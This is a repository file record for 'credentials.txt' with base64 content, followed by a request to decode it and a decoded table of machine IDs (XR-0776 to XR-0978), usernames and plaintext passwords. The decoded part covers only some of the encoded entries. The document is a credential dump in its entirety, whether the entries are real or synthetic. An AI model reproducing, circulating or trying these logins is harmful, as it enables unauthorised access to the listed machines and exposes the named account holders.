{"file_name":"credentials.txt","file_path":"credentials.txt","size":7839,"encoding":"base64","content_sha256":"62cf3a7351fb1208717b789b143da2ecec099123666c97733b3959d1f72aa1b9","ref":"main","blob_id":"fec38069bee81dbfb4dba3b5d9b62f26b07bf42f","commit_id":"c84d6e33dfa9250a3dd106de60c6cd1c6383ff2e","last_commit_id":"c84d6e33dfa9250a3dd106de60c6cd1c6383ff2e","execute_filemode":false,"content":"TWFjaGluZSB8IFVzZXJuYW1lIHwgUGFzc3dvcmQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpYUi0wNzc2IHwgaHVhbmdtaW4gfCA4STVWWnBnNE1mDQpYUi0wNzc3IHwgemhhbmdyb25nIHwgY0hZNzE2WmF1Zg0KWFItMDc3OCB8IGxpeWluZyB8IEpLZTVJRkVhc2INClhSLTA3NzkgfCB6aGFvbGkgfCBiWWFUOHBub1E3DQpYUi0wNzgwIHwgemhhbmd5YW4gfCBFeUhKVHhZNUxBDQpYUi0wNzgxIHwgemhvdWppbmcgfCA3QUpYeGZZOU9pDQpYUi0wNzgyIHwgbGl1eWluZyB8IDNRMjlreHVwc1UNClhSLTA3ODMgfCB3YW5naGFvIHwgQVBRNVN4dmQwbg0KWFItMDc4NCB8IHdhbmdxaWFuZyB8IFdlYmFCa3Y0bGgNClhSLTA3ODUgfCB3YW5nbHUgfCA1Q3RZYTlYbVpXDQpYUi0wNzg2IHwgemhhb3lvbmcgfCBGYnF1QXhFd0pmDQpYUi0wNzg3IHwgemhhbmdsaSB8IHBDdVBFYllsOEINClhSLTA3ODggfCB3YW5nbmluZyB8IEpMNkJ5OW1VRFANClhSLTA3ODkgfCB3YW5neXUgfCBXVklySE1salJoDQpYUi0wNzkwIHwgeWFuZ2xpIHwgaE51SExLeFU2bQ0KWFItMDc5MSB8IHpoYW5ncWlhbiB8IGU3UlNLNHduTFYNClhSLTA3OTIgfCBsaXNodWFpIHwgeW1qaWV1NUZ6UA0KWFItMDc5MyB8IHlhbmdsaXUgfCBRWGZabWNTVjk3DQpYUi0wNzk0IHwgd2FuZ3lpbmcgfCA1MUplMlA4aUZCDQpYUi0wNzk1IHwgY2hlbmppZSB8IGpGR3YzdEtTcDkNClhSLTA3OTYgfCB5YW5neW9uZyB8IHdhZlluRENKeHYNClhSLTA3OTcgfCBsaXBlbmcgfCBZQ28wYkJRck5KDQpYUi0wNzk4IHwgbGl4aW4gfCBwVDFEVWdiZmxDDQpYUi0wNzk5IHwgbGl1a2FpIHwgRWd5d1ZKVzJVbg0KWFItMDgwMCB8IG1hY2hhbyB8IEgxWHFsalJZZ0QNClhSLTA4MDEgfCBsaWppYSB8IHZ4alViZTFLN1YNClhSLTA4MDIgfCB6aGFuZ3BpbmcgfCBsUHE2TG1IaDh4DQpYUi0wODAzIHwgemhhbmdodWkgfCBaNG1qcHp0MjgxDQpYUi0wODA0IHwgemhhbmd3ZW4gfCBoVDB3cDJ4S2RKDQpYUi0wODA1IHwgd2FuZ21pbiB8IDZ5a3pSMkF1S2gNClhSLTA4MDYgfCBjaGVubGluIHwgUVBFRko3Yzhpbw0KWFItMDgwNyB8IGNoZW5qdWFuIHwga0FzQzlVdkJmUA0KWFItMDgwOCB8IGxpbmluZyB8IDRRZ1Q2NWRiTXoNClhSLTA4MDkgfCB3YW5nd2VpIHwgTVozZWhxOEdkMA0KWFItMDgxMCB8IHpoYW5nbmFuIHwgMXVYTDVqdmJscQ0KWFItMDgxMSB8IHdhbmd4aWEgfCBLMDRXMjNtVVh4DQpYUi0wODEyIHwgemhhbmd5dSB8IENpeWN3dUd4SEUNClhSLTA4MTMgfCBjaGVuY2hlbiB8IHE1R1BTWnYyckINClhSLTA4MTQgfCB3YW5nYmluZyB8IHRIZ3ZiQ1JqNUYNClhSLTA4MTUgfCBsaWxpbiB8IGJUckdGOTdSTUoNClhSLTA4MTYgfCB6aGFuZ2xpbmcgfCBUNUhmVVl3aDhuDQpYUi0wODE3IHwgY2hlbmxpbmcgfCAyTUgwc1hVdm5ODQpYUi0wODE4IHwgeWFuZ21laSB8IGpKNGlLUzZXTU4NClhSLTA4MTkgfCBsaXVxaWFuZyB8IExScHROWldVQWgNClhSLTA4MjAgfCBsaWhvbmcgfCBUWGJuTzc2b05nDQpYUi0wODIxIHwgbGlsZWkgfCBxdmFOMXJLMEFZDQpYUi0wODIyIHwgd2FuZ2h1YW4gfCBYM2lGY1R5T212DQpYUi0wODIzIHwgd2FuZ3hpbiB8IEFEU01kNGw1dzgNClhSLTA4MjQgfCB5YW5ncGluZyB8IFFSaWVqOUhjVEsNClhSLTA4MjUgfCBsaWppZSB8IEF6OU9HNGliQ0gNClhSLTA4MjYgfCB3YW5ncWlhbiB8IFBCOUtBdFRqV0MNClhSLTA4MjcgfCBsaXBpbmcgfCBSOHFGVEFRVjYzDQpYUi0wODI4IHwgbGl1aHVpIHwgWU96QWFOcThJbw0KWFItMDgyOSB8IHpoYW5nbWluZyB8IDRwMDhFY0Z6c20NClhSLTA4MzAgfCB6aGFuZ3lpbmcgfCBNSFB3VW9RSW1pDQpYUi0wODMxIHwgbGlibyB8IEUyM3p0STlMVWUNClhSLTA4MzIgfCBsaXVxaW4gfCBic21yUmtMb3FUDQpYUi0wODMzIHwgd2FuZ2NoYW8gfCBBQ3o1UTczb1VhDQpYUi0wODM0IHwgbGl1bGkgfCB4Mlh1WnNJSnRtDQpYUi0wODM1IHwgeWFuZ3dlaSB8IHdLWUhsRFhrbXENClhSLTA4MzYgfCB3YW5neWFuIHwgeWcxSFh4V3Uycw0KWFItMDgzNyB8IHdhbmdqaWFuIHwgelVvN3ZIYjhPWQ0KWFItMDgzOCB8IHpoYW5nYmluIHwgcjhtMDFDY1M0Zg0KWFItMDgzOSB8IHdhbmdsaSB8IEltOFdTZUdsRWYNClhSLTA4NDAgfCB3YW5nZGFuIHwgcUl2QlEwcDFrUA0KWFItMDg0MSB8IGxpdXhpYSB8IEI2OUtXSUFDdHENClhSLTA4NDIgfCB6aGFuZ3J1aSB8IHUyS1ZlYjY4M20NClhSLTA4NDMgfCB3YW5nZG9uZyB8IHJFdFRJVThCTEQNClhSLTA4NDQgfCB3YW5ndGluZyB8IEprdW5sejI5ZWcNClhSLTA4NDUgfCB6aGFuZ2ppYW4gfCBaeXA5bERvcmhnDQpYUi0wODQ2IHwgd2FuZ2h1YSB8IDc0a3NFNUJtSGMNClhSLTA4NDcgfCBsaXlhbiB8IHJFT0FzbExRUjANClhSLTA4NDggfCBsaXVmZW5nIHwgTFVaY3VvRnhmRw0KWFItMDg0OSB8IHpoYW5nYm8gfCBYSHZCVjR1alFjDQpYUi0wODUwIHwgbGl1bWluZyB8IGpCV0RKZlo5M2MNClhSLTA4NTEgfCBsaXVqaWEgfCBQbXBYS2NrVHM5DQpYUi0wODUyIHwgY2hlbnRhbyB8IDJzSHV0cE44aVkNClhSLTA4NTMgfCB6aGFuZ3RpbmcgfCBlM3dnMm5JdTdaDQpYUi0wODU0IHwgbGl1c2h1YWkgfCBpWTJmYnoxSFFCDQpYUi0wODU1IHwgbGlqaW5nIHwgTUNJY2w2c2dOUQ0KWFItMDg1NiB8IHdhbmdiaW4gfCBtc3hOU0lsajhHDQpYUi0wODU3IHwgbGlqaWFuIHwgSVVpbEV6NVNZUQ0KWFItMDg1OCB8IHpob3V5b25nIHwgdjM2Q1Q1SUxNVQ0KWFItMDg1OSB8IGxpdWRhbiB8IEFLa0NwRW5MdngNClhSLTA4NjAgfCB5YW5nYmluIHwgeUU5RzNWU25zTw0KWFItMDg2MSB8IGxpdXBlbmcgfCByeUxUZ2VEWmhJDQpYUi0wODYyIHwgY2hlbmp1biB8IGtuZ0VHQUNzUWgNClhSLTA4NjMgfCB3YW5nYm8gfCBGYks2ZnNpUEJuDQpYUi0wODY0IHwgbGliaW4gfCBiMkJjSFdDRVlPDQpYUi0wODY1IHwgemhhb3dlaSB8IDJocko2NHRncUcNClhSLTA4NjYgfCBsaWp1YW4gfCBYQmtnS3lzVWJ6DQpYUi0wODY3IHwgY2hlbmNoYW8gfCBvRFU3dlBaODRCDQpYUi0wODY4IHwgd2FuZ21pbmcgfCB2S3BWMTNEZW1KDQpYUi0wODY5IHwgbGlmYW5nIHwgVGJ6RTN0V0Y0eQ0KWFItMDg3MCB8IHdhbmd0YW8gfCB5YXhwUFdSa2lCDQpYUi0wODcxIHwgbGl1ZmFuZyB8IEZkZThHdDFibXENClhSLTA4NzIgfCBsaXRhbyB8IFZDdXJwd1hJQTQNClhSLTA4NzMgfCB5YW5nbGluZyB8IFBJbnFSMnhCSzANClhSLTA4NzQgfCB5YW5neHVlIHwgc3hqUTc1bUx6Sw0KWFItMDg3NSB8IGxpdWJpbiB8IHNXZWhhckNkWEUNClhSLTA4NzYgfCB5YW5neWFuZyB8IEZaNnI4TE1BNVUNClhSLTA4NzcgfCB4dXdlaSB8IDBCNER1MWg3elYNClhSLTA4NzggfCBjaGVueW9uZyB8IEZvbHE1aU9uZWoNClhSLTA4NzkgfCB5YW5nYm8gfCBabElzOUxZTmVXDQpYUi0wODgwIHwgemhhbmdodWEgfCBvRkhVMVowVktNDQpYUi0wODgxIHwgemhhb21pbiB8IElhZmpOTzNIaWINClhSLTA4ODIgfCBjaGVucGluZyB8IHFKUVhLa1ZwRlANClhSLTA4ODMgfCB6aGFuZ2xlaSB8IDYxa2NMeHFUaXUNClhSLTA4ODQgfCB6aGFuZ2xpYW5nIHwgajVMczJIdWIzaQ0KWFItMDg4NSB8IHpoYW5ndGFvIHwgNVBBY1FHeTQ2MQ0KWFItMDg4NiB8IHpoYW5neHVlIHwgZVkzRHJ3c2lqUQ0KWFItMDg4NyB8IGxpcWlhbiB8IDdqSHZvbXBTVE4NClhSLTA4ODggfCBsaXdlaSB8IHdqVEZFOHgwSVkNClhSLTA4ODkgfCBjaGVuYmluIHwgc203bFI4Nlk0cA0KWFItMDg5MCB8IHpoYW5neXVuIHwgbVd6a3lESk1ScQ0KWFItMDg5MSB8IHdhbmd4dWUgfCBwZlI1Vm9VWk8xDQpYUi0wODkyIHwgemhvdXdlaSB8IG9OM1NkNjBraHMNClhSLTA4OTMgfCBsaWthaSB8IFF3enZLMXFtNGoNClhSLTA4OTQgfCBnYW9mZW5nIHwgNWZRdmpGVTF1Tg0KWFItMDg5NSB8IHdhbmdsZWkgfCAxYXBUa0JyOVk2DQpYUi0wODk2IHwgbGlqdW4gfCBjVkJJOG5zQ3dBDQpYUi0wODk3IHwgbGl1d2VpIHwgMFZCZWN2VDRBdQ0KWFItMDg5OCB8IHdhbmdnYW5nIHwgckNHQjR3Rmg1WA0KWFItMDg5OSB8IGxpdXBpbmcgfCBVUWFYOURCTGJKDQpYUi0wOTAwIHwgemhhbmduaW5nIHwgU0xxSmlNMVFUeQ0KWFItMDkwMSB8IGxpYmluZyB8IFpnWGxqNlZLUHUNClhSLTA5MDIgfCB6aGFuZ2NoYW8gfCB0U0JwVmppWWg4DQpYUi0wOTAzIHwgemhhbmd4aWEgfCBoUmxZWGtxY2VDDQpYUi0wOTA0IHwgbGltaW4gfCBzM0k0bEZjdG9FDQpYUi0wOTA1IHwgbGl1bGVpIHwgVjVyc0trZVdTSg0KWFItMDkwNiB8IHdhbmdsaW5nIHwgbEw3UWluQnlkRw0KWFItMDkwNyB8IHpoYW5nZmVpIHwgak8xeHRVNmhQNA0KWFItMDkwOCB8IGNoZW5sb25nIHwgd0tERnFjT2ZtcA0KWFItMDkwOSB8IGxpdWZlaSB8IDM2QmpJVzFWZ0gNClhSLTA5MTAgfCBjaGVubGkgfCBlWWlPaDRqV1VxDQpYUi0wOTExIHwgY2hlbnlhbiB8IG9hZDhyWWJ3ZnMNClhSLTA5MTIgfCBjaGVucGVuZyB8IFVTMkFtMWlJazgNClhSLTA5MTMgfCB3YW5ncnVpIHwgRFRaMXhnejNjUw0KWFItMDkxNCB8IHpoYW5nZmVuZyB8IFNIeE5CeUd1d1gNClhSLTA5MTUgfCB5YW5nbGluIHwgcml3VzNVa0k0bw0KWFItMDkxNiB8IGxpdXRhbyB8IEhGVlVPWkVQcEwNClhSLTA5MTcgfCBsaXlvbmcgfCB3WnlFdVZ2T2pRDQpYUi0wOTE4IHwgd2FuZ25hIHwgNmk4NDB3bWJ2MQ0KWFItMDkxOSB8IHdhbmdqdWFuIHwgZkp2NFBLQVN6Yg0KWFItMDkyMCB8IHdhbmdodWkgfCA3cVQ0d2NNU0d2DQpYUi0wOTIxIHwgbGlsb25nIHwgcEhUa2wzZEVJVQ0KWFItMDkyMiB8IGxpbGkgfCAwTFJReEl1Vjl0DQpYUi0wOTIzIHwgemhhbmdzaHVhaSB8IHdTYkVhakh6WnMNClhSLTA5MjQgfCB6aGFuZ2ZhbiB8IFRyZkNNbG1ZNTkNClhSLTA5MjUgfCBsaXVqaW5nIHwgZ3RPc2xOUURCMg0KWFItMDkyNiB8IGxpdXFpYW4gfCB0cVg5RFZMVEhJDQpYUi0wOTI3IHwgeWFuZ2ZhbmcgfCBzYTE4T2xJTG1CDQpYUi0wOTI4IHwgY2hlbnFpYW5nIHwgVkVLbmx3Z0ZwVQ0KWFItMDkyOSB8IGxpcWlhbmcgfCBwWmJqN3o5SDh2DQpYUi0wOTMwIHwgeWFuZ2p1biB8IHBxYWhkRksyUFoNClhSLTA5MzEgfCBjaGVuYm8gfCA3OFNtVXUxZ2ZpDQpYUi0wOTMyIHwgemhhbmd5b25nIHwgQ1M0c3gwTXZVRg0KWFItMDkzMyB8IHdhbmdsaWFuZyB8IDR2VjZVanF6T1ENClhSLTA5MzQgfCB3YW5neHUgfCBVZlRnaTQwRFY5DQpYUi0wOTM1IHwgY2hlbmh1YSB8IGxXUzIwN3ZkT2YNClhSLTA5MzYgfCB6aG91bGkgfCBEdU1pUU9iMHFLDQpYUi0wOTM3IHwgbGl1YmluZyB8IE5Yd0FyZWFiZ2QNClhSLTA5MzggfCB6aGFvamluZyB8IFJ1M0dlbjhZQk0NClhSLTA5MzkgfCB5YW5neWFuIHwgSUhycG1lVE5mbA0KWFItMDk0MCB8IGNoZW5mYW5nIHwgZDNuVUdSZ3MyNA0KWFItMDk0MSB8IHpoYW5naGFvIHwgWXUwWmJFS0ZJVA0KWFItMDk0MiB8IHdhbmd5dW4gfCAwcndUbWVkOFNKDQpYUi0wOTQzIHwgemhhbmd4aW4gfCA4dlBGNWh6b0FhDQpYUi0wOTQ0IHwgemhhbmd3ZWkgfCBZTHdVcEhOUzZYDQpYUi0wOTQ1IHwgd2FuZ3BpbmcgfCBGcWhmTW96U1hwDQpYUi0wOTQ2IHwgd2FuZ2thaSB8IEQwNGJYSFRLcGMNClhSLTA5NDcgfCBsaXVjaGFuZyB8IFVlNjBYM3NHclMNClhSLTA5NDggfCBsaXh1ZSB8IENIYmdxT1RlSWMNClhSLTA5NDkgfCBsaW5hIHwgcndhbnlkbGpWdQ0KWFItMDk1MCB8IGxpd2VuIHwgZWRjME03eXZRdQ0KWFItMDk1MSB8IGxpbWluZyB8IHl6aVNqV0JvQ0gNClhSLTA5NTIgfCBsaWxpbmcgfCB3bWRqUmFJQkFTDQpYUi0wOTUzIHwgY2hlbndlaSB8IHhjcU41VlBiQ00NClhSLTA5NTQgfCBsaWhhbyB8IGlVcG1EWVMyQ0wNClhSLTA5NTUgfCB3YW5nbGluIHwgNXBnRm9qVDZ3SQ0KWFItMDk1NiB8IHpoYW5nbGluIHwgeDdPZ0tUZGh5UQ0KWFItMDk1NyB8IHh1bWluIHwgUXVNS1JIb0IzVQ0KWFItMDk1OCB8IGxpdXlhbiB8IGcxd043eWRyTGgNClhSLTA5NTkgfCB6aGFuZ21pbiB8IGU5WEJRcUV0UHANClhSLTA5NjAgfCB6aGFuZ3FpYW5nIHwgdmNLUllVRE9HTA0KWFItMDk2MSB8IHlhbmdjaGFvIHwgTWhVa0VlV1lCRg0KWFItMDk2MiB8IHlhbmdodWEgfCBmWlVDU2FvaUl0DQpYUi0wOTYzIHwgbGlnYW5nIHwgQ2RnRmpOZjFNaw0KWFItMDk2NCB8IGxpdXhpbiB8IGtuSGhKbUJ3RU0NClhSLTA5NjUgfCBsaXVodWFuIHwgcFpTSE5oamtxOQ0KWFItMDk2NiB8IGxpZmVuZyB8IGpSQWtGeExUNWUNClhSLTA5NjcgfCBsaXVnYW5nIHwgWUEybVZ6U3M1Sw0KWFItMDk2OCB8IHlhbmd0YW8gfCA0YjMyVFFMUDZ5DQpYUi0wOTY5IHwgbGl1aGFvIHwgMEVQWjZGeWlzbQ0KWFItMDk3MCB8IGxpY2hhbyB8IHVsdExReldOMzQNClhSLTA5NzEgfCB5YW5naG9uZyB8IElnMkJOTE11V2YNClhSLTA5NzIgfCBjaGVuaG9uZyB8IFE0ZU9qTnltNlMNClhSLTA5NzMgfCBzdW53ZWkgfCBkcmpVWWdpM1QwDQpYUi0wOTc0IHwgemhhbmdob25nIHwgc1JrbVFJQjVMYQ0KWFItMDk3NSB8IHpoYW5nZGFuIHwgYjJIb1NDdWhhTQ0KWFItMDk3NiB8IGxpdW1pbiB8IEZQUm02Vzd3R3MNClhSLTA5NzcgfCB3YW5nbWVpIHwgeXE3TVZjajRzZQ0KWFItMDk3OCB8IHpoYW5namluZyB8IFdSNEVmMTZGaVUNClhSLTA5NzkgfCBsaXVqdW4gfCBERXdZeVNmNk5pDQpYUi0wOTgwIHwgd2FuZ3lvbmcgfCBoOVhNWmlFdjBnDQpYUi0wOTgxIHwgaHVhbmd5b25nIHwgRGdvSXlQU1RIWg0KWFItMDk4MiB8IGxpeGlhbmcgfCBUQW9QY3BpRjNnDQpYUi0wOTgzIHwgemhvdWppZSB8IFlybEIyZ011eEYNClhSLTA5ODQgfCBsaXVjaGFvIHwgaWphRFk0SWxyMw0KWFItMDk4NSB8IGxpdW5hIHwgNnhuMmpvMTdTRQ0KWFItMDk4NiB8IHdhbmdqaW5nIHwgNjVNaEdWSTBvTA0KWFItMDk4NyB8IGxpdWxpbmcgfCBNam1OOWFoU0xSDQpYUi0wOTg4IHwgY2hlbmppbmcgfCBoYTIzeWZxY1BnDQpYUi0wOTg5IHwgd2FuZ3FpbiB8IE1zZFc4NWd6RkwNClhSLTA5OTAgfCB3YW5nbG9uZyB8IE8zb0QxbHNjQUsNClhSLTA5OTEgfCBjaGVubGVpIHwgM3Z0QUpxenJZQg0KWFItMDk5MiB8IHlhbmdqaWUgfCBmdVRCZXE2ejUxDQpYUi0wOTkzIHwgemhhbmdqdW4gfCBsMDJHQUVVSHE5DQpYUi0wOTk0IHwgeWFuZ21pbmcgfCBOM2JZVXFmZW5jDQpYUi0wOTk1IHwgemhhbmdtZWkgfCBTN0RHNWJnWHRODQpYUi0wOTk2IHwgd2FuZ3JvbmcgfCAyQlBtYXhpbEdxDQpYUi0wOTk3IHwgemhhbmdwZW5nIHwgQkhPcURtQ1hNbg0KWFItMDk5OCB8IGxpdXl1biB8IENCN3N4Yms4NEkNClhSLTA5OTkgfCB3YW5na3VuIHwgS3VKSDUxOU9XZw0KWFItMDEwMDAgfCBjaGVubWluIHwgZTRnUUdIb3JxMw0KWFItMDEwMDEgfCBsaXFpbiB8IDR6RUprWVBJcHENClhSLTAxMDAyIHwgd2FuZ2ZhbmcgfCBGVFZZZDRXMDJ1DQpYUi0wMTAwMyB8IGxpdWh1YSB8IFA5bmRmdTh3R2gNClhSLTAxMDA0IHwgemhhbmdxaW4gfCAwZjFKVE41UXFwDQpYUi0wMTAwNSB8IHpoYW5nbG9uZyB8IG5IOG1EcFJiY04NClhSLTAxMDA2IHwgemhhbmdqaWUgfCBjVFZ3TTI1eTNoDQpYUi0wMTAwNyB8IGxpbGlhbmcgfCBSZjZ6WFYwWUVJDQpYUi0wMTAwOCB8IGxpeXVuIHwgM2h4VG1Fb01CbA0KWFItMDEwMDkgfCB3YW5nY2hlbmcgfCBCb3k0RXpwOTg3DQpYUi0wMTAxMCB8IHlhbmdqaW5nIHwgZ2poYlhIY0xXMA0KWFItMDEwMTEgfCBjaGVueWluZyB8IGtvR0ZjUGVCbWkNClhSLTAxMDEyIHwgbGlodWEgfCBuU09qZVlWM05yDQpYUi0wMTAxMyB8IGxpdW1laSB8IHl4QW0ybldOcDkNClhSLTAxMDE0IHwgeWFuZ2p1YW4gfCBHcGU2QXUyaHhGDQpYUi0wMTAxNSB8IGxpZGFuIHwgb2dETHpNaENWUA0KWFItMDEwMTYgfCBsaXlhbmcgfCBuRFd2R2hOTW9lDQpYUi0wMTAxNyB8IHpoYW9qdW4gfCBYdGZaWU94ZURK"}

base64解码一下

Machine | Username | Password
-----------------------------
XR-0776 | huangmin | 8I5VZpg4Mf
XR-0777 | zhangrong | cHY716Zauf
XR-0778 | liying | JKe5IFEasb
XR-0779 | zhaoli | bYaT8pnoQ7
XR-0780 | zhangyan | EyHJTxY5LA
XR-0781 | zhoujing | 7AJXxfY9Oi
XR-0782 | liuying | 3Q29kxupsU
XR-0783 | wanghao | APQ5Sxvd0n
XR-0784 | wangqiang | WebaBkv4lh
XR-0785 | wanglu | 5CtYa9XmZW
XR-0786 | zhaoyong | FbquAxEwJf
XR-0787 | zhangli | pCuPEbYl8B
XR-0788 | wangning | JL6By9mUDP
XR-0789 | wangyu | WVIrHMljRh
XR-0790 | yangli | hNuHLKxU6m
XR-0791 | zhangqian | e7RSK4wnLV
XR-0792 | lishuai | ymjieu5FzP
XR-0793 | yangliu | QXfZmcSV97
XR-0794 | wangying | 51Je2P8iFB
XR-0795 | chenjie | jFGv3tKSp9
XR-0796 | yangyong | wafYnDCJxv
XR-0797 | lipeng | YCo0bBQrNJ
XR-0798 | lixin | pT1DUgbflC
XR-0799 | liukai | EgywVJW2Un
XR-0800 | machao | H1XqljRYgD
XR-0801 | lijia | vxjUbe1K7V
XR-0802 | zhangping | lPq6LmHh8x
XR-0803 | zhanghui | Z4mjpzt281
XR-0804 | zhangwen | hT0wp2xKdJ
XR-0805 | wangmin | 6ykzR2AuKh
XR-0806 | chenlin | QPEFJ7c8io
XR-0807 | chenjuan | kAsC9UvBfP
XR-0808 | lining | 4QgT65dbMz
XR-0809 | wangwei | MZ3ehq8Gd0
XR-0810 | zhangnan | 1uXL5jvblq
XR-0811 | wangxia | K04W23mUXx
XR-0812 | zhangyu | CiycwuGxHE
XR-0813 | chenchen | q5GPSZv2rB
XR-0814 | wangbing | tHgvbCRj5F
XR-0815 | lilin | bTrGF97RMJ
XR-0816 | zhangling | T5HfUYwh8n
XR-0817 | chenling | 2MH0sXUvnN
XR-0818 | yangmei | jJ4iKS6WMN
XR-0819 | liuqiang | LRptNZWUAh
XR-0820 | lihong | TXbnO76oNg
XR-0821 | lilei | qvaN1rK0AY
XR-0822 | wanghuan | X3iFcTyOmv
XR-0823 | wangxin | ADSMd4l5w8
XR-0824 | yangping | QRiej9HcTK
XR-0825 | lijie | Az9OG4ibCH
XR-0826 | wangqian | PB9KAtTjWC
XR-0827 | liping | R8qFTAQV63
XR-0828 | liuhui | YOzAaNq8Io
XR-0829 | zhangming | 4p08EcFzsm
XR-0830 | zhangying | MHPwUoQImi
XR-0831 | libo | E23ztI9LUe
XR-0832 | liuqin | bsmrRkLoqT
XR-0833 | wangchao | ACz5Q73oUa
XR-0834 | liuli | x2XuZsIJtm
XR-0835 | yangwei | wKYHlDXkmq
XR-0836 | wangyan | yg1HXxWu2s
XR-0837 | wangjian | zUo7vHb8OY
XR-0838 | zhangbin | r8m01CcS4f
XR-0839 | wangli | Im8WSeGlEf
XR-0840 | wangdan | qIvBQ0p1kP
XR-0841 | liuxia | B69KWIACtq
XR-0842 | zhangrui | u2KVeb683m
XR-0843 | wangdong | rEtTIU8BLD
XR-0844 | wangting | Jkunlz29eg
XR-0845 | zhangjian | Zyp9lDorhg
XR-0846 | wanghua | 74ksE5BmHc
XR-0847 | liyan | rEOAslLQR0
XR-0848 | liufeng | LUZcuoFxfG
XR-0849 | zhangbo | XHvBV4ujQc
XR-0850 | liuming | jBWDJfZ93c
XR-0851 | liujia | PmpXKckTs9
XR-0852 | chentao | 2sHutpN8iY
XR-0853 | zhangting | e3wg2nIu7Z
XR-0854 | liushuai | iY2fbz1HQB
XR-0855 | lijing | MCIcl6sgNQ
XR-0856 | wangbin | msxNSIlj8G
XR-0857 | lijian | IUilEz5SYQ
XR-0858 | zhouyong | v36CT5ILMU
XR-0859 | liudan | AKkCpEnLvx
XR-0860 | yangbin | yE9G3VSnsO
XR-0861 | liupeng | ryLTgeDZhI
XR-0862 | chenjun | kngEGACsQh
XR-0863 | wangbo | FbK6fsiPBn
XR-0864 | libin | b2BcHWCEYO
XR-0865 | zhaowei | 2hrJ64tgqG
XR-0866 | lijuan | XBkgKysUbz
XR-0867 | chenchao | oDU7vPZ84B
XR-0868 | wangming | vKpV13DemJ
XR-0869 | lifang | TbzE3tWF4y
XR-0870 | wangtao | yaxpPWRkiB
XR-0871 | liufang | Fde8Gt1bmq
XR-0872 | litao | VCurpwXIA4
XR-0873 | yangling | PInqR2xBK0
XR-0874 | yangxue | sxjQ75mLzK
XR-0875 | liubin | sWeharCdXE
XR-0876 | yangyang | FZ6r8LMA5U
XR-0877 | xuwei | 0B4Du1h7zV
XR-0878 | chenyong | Folq5iOnej
XR-0879 | yangbo | ZlIs9LYNeW
XR-0880 | zhanghua | oFHU1Z0VKM
XR-0881 | zhaomin | IafjNO3Hib
XR-0882 | chenping | qJQXKkVpFP
XR-0883 | zhanglei | 61kcLxqTiu
XR-0884 | zhangliang | j5Ls2Hub3i
XR-0885 | zhangtao | 5PAcQGy461
XR-0886 | zhangxue | eY3DrwsijQ
XR-0887 | liqian | 7jHvompSTN
XR-0888 | liwei | wjTFE8x0IY
XR-0889 | chenbin | sm7lR86Y4p
XR-0890 | zhangyun | mWzkyDJMRq
XR-0891 | wangxue | pfR5VoUZO1
XR-0892 | zhouwei | oN3Sd60khs
XR-0893 | likai | QwzvK1qm4j
XR-0894 | gaofeng | 5fQvjFU1uN
XR-0895 | wanglei | 1apTkBr9Y6
XR-0896 | lijun | cVBI8nsCwA
XR-0897 | liuwei | 0VBecvT4Au
XR-0898 | wanggang | rCGB4wFh5X
XR-0899 | liuping | UQaX9DBLbJ
XR-0900 | zhangning | SLqJiM1QTy
XR-0901 | libing | ZgXlj6VKPu
XR-0902 | zhangchao | tSBpVjiYh8
XR-0903 | zhangxia | hRlYXkqceC
XR-0904 | limin | s3I4lFctoE
XR-0905 | liulei | V5rsKkeWSJ
XR-0906 | wangling | lL7QinBydG
XR-0907 | zhangfei | jO1xtU6hP4
XR-0908 | chenlong | wKDFqcOfmp
XR-0909 | liufei | 36BjIW1VgH
XR-0910 | chenli | eYiOh4jWUq
XR-0911 | chenyan | oad8rYbwfs
XR-0912 | chenpeng | US2Am1iIk8
XR-0913 | wangrui | DTZ1xgz3cS
XR-0914 | zhangfeng | SHxNByGuwX
XR-0915 | yanglin | riwW3UkI4o
XR-0916 | liutao | HFVUOZEPpL
XR-0917 | liyong | wZyEuVvOjQ
XR-0918 | wangna | 6i840wmbv1
XR-0919 | wangjuan | fJv4PKASzb
XR-0920 | wanghui | 7qT4wcMSGv
XR-0921 | lilong | pHTkl3dEIU
XR-0922 | lili | 0LRQxIuV9t
XR-0923 | zhangshuai | wSbEajHzZs
XR-0924 | zhangfan | TrfCMlmY59
XR-0925 | liujing | gtOslNQDB2
XR-0926 | liuqian | tqX9DVLTHI
XR-0927 | yangfang | sa18OlILmB
XR-0928 | chenqiang | VEKnlwgFpU
XR-0929 | liqiang | pZbj7z9H8v
XR-0930 | yangjun | pqahdFK2PZ
XR-0931 | chenbo | 78SmUu1gfi
XR-0932 | zhangyong | CS4sx0MvUF
XR-0933 | wangliang | 4vV6UjqzOQ
XR-0934 | wangxu | UfTgi40DV9
XR-0935 | chenhua | lWS207vdOf
XR-0936 | zhouli | DuMiQOb0qK
XR-0937 | liubing | NXwAreabgd
XR-0938 | zhaojing | Ru3Gen8YBM
XR-0939 | yangyan | IHrpmeTNfl
XR-0940 | chenfang | d3nUGRgs24
XR-0941 | zhanghao | Yu0ZbEKFIT
XR-0942 | wangyun | 0rwTmed8SJ
XR-0943 | zhangxin | 8vPF5hzoAa
XR-0944 | zhangwei | YLwUpHNS6X
XR-0945 | wangping | FqhfMozSXp
XR-0946 | wangkai | D04bXHTKpc
XR-0947 | liuchang | Ue60X3sGrS
XR-0948 | lixue | CHbgqOTeIc
XR-0949 | lina | rwanydljVu
XR-0950 | liwen | edc0M7yvQu
XR-0951 | liming | yziSjWBoCH
XR-0952 | liling | wmdjRaIBAS
XR-0953 | chenwei | xcqN5VPbCM
XR-0954 | lihao | iUpmDYS2CL
XR-0955 | wanglin | 5pgFojT6wI
XR-0956 | zhanglin | x7OgKTdhyQ
XR-0957 | xumin | QuMKRHoB3U
XR-0958 | liuyan | g1wN7ydrLh
XR-0959 | zhangmin | e9XBQqEtPp
XR-0960 | zhangqiang | vcKRYUDOGL
XR-0961 | yangchao | MhUkEeWYBF
XR-0962 | yanghua | fZUCSaoiIt
XR-0963 | ligang | CdgFjNf1Mk
XR-0964 | liuxin | knHhJmBwEM
XR-0965 | liuhuan | pZSHNhjkq9
XR-0966 | lifeng | jRAkFxLT5e
XR-0967 | liugang | YA2mVzSs5K
XR-0968 | yangtao | 4b32TQLP6y
XR-0969 | liuhao | 0EPZ6Fyism
XR-0970 | lichao | ultLQzWN34
XR-0971 | yanghong | Ig2BNLMuWf
XR-0972 | chenhong | Q4eOjNym6S
XR-0973 | sunwei | drjUYgi3T0
XR-0974 | zhanghong | sRkmQIB5La
XR-0975 | zhangdan | b2HoSCuhaM
XR-0976 | liumin | FPRm6W7wGs
XR-0977 | wangmei | yq7MVcj4se
XR-0978 | zhangjing | WR4Ef16FiU
